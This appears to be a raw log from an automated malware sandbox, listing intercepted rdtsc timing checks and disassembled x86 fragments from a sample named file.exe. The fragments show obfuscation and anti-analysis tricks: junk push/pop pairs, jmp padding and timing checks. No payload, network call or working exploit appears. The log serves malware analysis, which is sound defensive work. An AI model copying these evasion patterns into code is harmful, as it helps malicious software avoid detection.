Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30931 second address: 4F30935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30935 second address: 4F3094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4DCCF8FBCBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F3094B second address: 4F30984 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F4DCCCB3CDEh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movsx edi, si 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30984 second address: 4F30989 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30989 second address: 4F309B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4DCCCB3CDAh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F309B0 second address: 4F309C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBCEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30B3E second address: 4F30B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30B42 second address: 4F30B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F30B48 second address: 4F30B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40D31 second address: 4F40D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007F4DCCF8FBD8h 0x0000000e or ecx, 6F7FAFF8h 0x00000014 jmp 00007F4DCCF8FBCBh 0x00000019 popfd 0x0000001a mov ax, B12Fh 0x0000001e popad 0x0000001f push eax 0x00000020 jmp 00007F4DCCF8FBD5h 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4DCCF8FBCDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40D8F second address: 4F40DB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, 18931DCEh 0x00000013 mov ax, di 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40DB2 second address: 4F40DB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A40 second address: 4F40A46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A46 second address: 4F40A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A4A second address: 4F40A6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4DCCCB3CE5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A6A second address: 4F40A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCF8FBCCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A7A second address: 4F40A8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4DCCCB3CDAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A8F second address: 4F40A95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A95 second address: 4F40A99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40A99 second address: 4F40B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F4DCCF8FBCCh 0x00000013 mov dx, si 0x00000016 pop esi 0x00000017 pushfd 0x00000018 jmp 00007F4DCCF8FBD7h 0x0000001d add esi, 79136FAEh 0x00000023 jmp 00007F4DCCF8FBD9h 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F4DCCF8FBD8h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40B15 second address: 4F40B19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F40B19 second address: 4F40B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC0697 second address: 4FC069D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC069D second address: 4FC06A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC06A1 second address: 4FC06A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC06A5 second address: 4FC06E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F4DCCF8FBD0h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4DCCF8FBCCh 0x00000018 sub ch, FFFFFFC8h 0x0000001b jmp 00007F4DCCF8FBCBh 0x00000020 popfd 0x00000021 mov bx, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC06E2 second address: 4FC0703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov esi, edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC0703 second address: 4FC0708 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC0708 second address: 4FC0730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4DCCCB3CE0h 0x00000009 xor ecx, 1125C188h 0x0000000f jmp 00007F4DCCCB3CDBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC0730 second address: 4FC0754 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007F4DCCF8FBD4h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FC0754 second address: 4FC075A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FB07EA second address: 4FB07EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F500E8 second address: 4F500EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F500EC second address: 4F500F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F500F0 second address: 4F500F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F500F6 second address: 4F500FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F500FC second address: 4F50100 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50100 second address: 4F50104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50104 second address: 4F50169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ah, dl 0x0000000c pushfd 0x0000000d jmp 00007F4DCCCB3CE4h 0x00000012 sub ax, 3E98h 0x00000017 jmp 00007F4DCCCB3CDBh 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f jmp 00007F4DCCCB3CE6h 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F4DCCCB3CE7h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F50169 second address: 4F501A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4DCCF8FBD3h 0x00000012 pop esi 0x00000013 mov di, 24FCh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FB0AEE second address: 4FB0AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4FB0AF4 second address: 4FB0AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60697 second address: 4F6069D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6069D second address: 4F606BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F606BD second address: 4F606C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F606C1 second address: 4F606C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F606C5 second address: 4F606CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F606CB second address: 4F60701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4DCCF8FBD3h 0x00000008 mov edi, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov edi, esi 0x00000011 mov ax, FA33h 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 pushad 0x00000019 mov dx, si 0x0000001c popad 0x0000001d push FFFFFFFEh 0x0000001f pushad 0x00000020 pushad 0x00000021 mov di, 754Ch 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60701 second address: 4F607E8 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 call 00007F4DCCCB3CD9h 0x0000000d jmp 00007F4DCCCB3CE4h 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F4DCCCB3CE1h 0x0000001a jmp 00007F4DCCCB3CDBh 0x0000001f popfd 0x00000020 pushad 0x00000021 call 00007F4DCCCB3CE6h 0x00000026 pop esi 0x00000027 mov si, bx 0x0000002a popad 0x0000002b popad 0x0000002c mov eax, dword ptr [esp+04h] 0x00000030 pushad 0x00000031 mov esi, 27736579h 0x00000036 pushfd 0x00000037 jmp 00007F4DCCCB3CE6h 0x0000003c and si, 0888h 0x00000041 jmp 00007F4DCCCB3CDBh 0x00000046 popfd 0x00000047 popad 0x00000048 mov eax, dword ptr [eax] 0x0000004a jmp 00007F4DCCCB3CE9h 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 pushad 0x00000054 pushad 0x00000055 call 00007F4DCCCB3CDDh 0x0000005a pop esi 0x0000005b jmp 00007F4DCCCB3CE1h 0x00000060 popad 0x00000061 push eax 0x00000062 pushad 0x00000063 popad 0x00000064 pop ebx 0x00000065 popad 0x00000066 pop eax 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a mov ebx, 6E00C878h 0x0000006f mov dh, F4h 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F607E8 second address: 4F6080C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 movsx edx, ax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c call 00007F4DCCF8FBC9h 0x00000011 pushad 0x00000012 jmp 00007F4DCCF8FBCAh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6080C second address: 4F60842 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F4DCCCB3CE3h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4DCCCB3CE4h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60842 second address: 4F6086C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edi, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e mov al, bh 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F4DCCF8FBD3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6086C second address: 4F60872 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60872 second address: 4F60876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60876 second address: 4F608D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007F4DCCCB3CE7h 0x0000000e mov eax, dword ptr fs:[00000000h] 0x00000014 jmp 00007F4DCCCB3CE6h 0x00000019 nop 0x0000001a jmp 00007F4DCCCB3CE0h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4DCCCB3CDEh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F608D4 second address: 4F608FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F4DCCF8FBCCh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4DCCF8FBD3h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F608FF second address: 4F60905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60905 second address: 4F6092A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4DCCF8FBD8h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6092A second address: 4F6093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCCB3CDEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6093C second address: 4F6094B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov eax, ebx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6094B second address: 4F6095B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4DCCCB3CDCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6095B second address: 4F6095F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F6095F second address: 4F60970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movsx ebx, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60970 second address: 4F609BA instructions: 0x00000000 rdtsc 0x00000002 mov si, CC7Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007F4DCCF8FBD0h 0x0000000d pushfd 0x0000000e jmp 00007F4DCCF8FBD2h 0x00000013 add ecx, 22F364F8h 0x00000019 jmp 00007F4DCCF8FBCBh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 popad 0x00000021 push ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 movsx ebx, cx 0x00000028 mov dx, cx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F609BA second address: 4F60A28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c jmp 00007F4DCCCB3CE6h 0x00000011 xchg eax, edi 0x00000012 jmp 00007F4DCCCB3CE0h 0x00000017 push eax 0x00000018 jmp 00007F4DCCCB3CDBh 0x0000001d xchg eax, edi 0x0000001e pushad 0x0000001f call 00007F4DCCCB3CE4h 0x00000024 pushad 0x00000025 popad 0x00000026 pop eax 0x00000027 mov bh, 2Bh 0x00000029 popad 0x0000002a mov eax, dword ptr [76FBB370h] 0x0000002f pushad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60A28 second address: 4F60ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov ax, E2B7h 0x00000009 popad 0x0000000a xor dword ptr [ebp-08h], eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F4DCCF8FBD8h 0x00000014 and eax, 095908D8h 0x0000001a jmp 00007F4DCCF8FBCBh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F4DCCF8FBD8h 0x00000026 sub ecx, 6D89D338h 0x0000002c jmp 00007F4DCCF8FBCBh 0x00000031 popfd 0x00000032 popad 0x00000033 xor eax, ebp 0x00000035 jmp 00007F4DCCF8FBCFh 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 pushfd 0x00000041 jmp 00007F4DCCF8FBD1h 0x00000046 and ax, E486h 0x0000004b jmp 00007F4DCCF8FBD1h 0x00000050 popfd 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60ACE second address: 4F60B38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 jmp 00007F4DCCCB3CE8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F4DCCCB3CDBh 0x00000014 nop 0x00000015 pushad 0x00000016 mov bl, al 0x00000018 mov ebx, 0C78AE34h 0x0000001d popad 0x0000001e lea eax, dword ptr [ebp-10h] 0x00000021 jmp 00007F4DCCCB3CE3h 0x00000026 mov dword ptr fs:[00000000h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F4DCCCB3CE5h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60B38 second address: 4F60BA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007F4DCCF8FBCCh 0x00000012 mov bh, al 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+10h] 0x00000018 jmp 00007F4DCCF8FBCDh 0x0000001d test eax, eax 0x0000001f pushad 0x00000020 pushad 0x00000021 mov eax, 12A4E8B5h 0x00000026 call 00007F4DCCF8FBD2h 0x0000002b pop esi 0x0000002c popad 0x0000002d popad 0x0000002e jne 00007F4E3EEEED5Ch 0x00000034 pushad 0x00000035 popad 0x00000036 mov eax, 00000000h 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BA1 second address: 4F60BA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BA5 second address: 4F60BB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCF8FBCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BB6 second address: 4F60BBC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BBC second address: 4F60BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BC0 second address: 4F60BC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BC4 second address: 4F60BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-20h], eax 0x0000000b jmp 00007F4DCCF8FBCFh 0x00000010 mov ebx, dword ptr [esi] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4DCCF8FBD5h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F60BF7 second address: 4F60C51 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4DCCCB3CE1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c jmp 00007F4DCCCB3CDEh 0x00000011 test ebx, ebx 0x00000013 jmp 00007F4DCCCB3CE0h 0x00000018 je 00007F4E3EC12D24h 0x0000001e jmp 00007F4DCCCB3CE0h 0x00000023 cmp ebx, FFFFFFFFh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dl, FDh 0x0000002b mov di, ax 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F601F6 second address: 4F601FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A524h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4F601FF second address: 4F6022A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F4DCCCB3CE9h 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov dx, D5EEh 0x00000016 popad 0x00000017 rdtsc
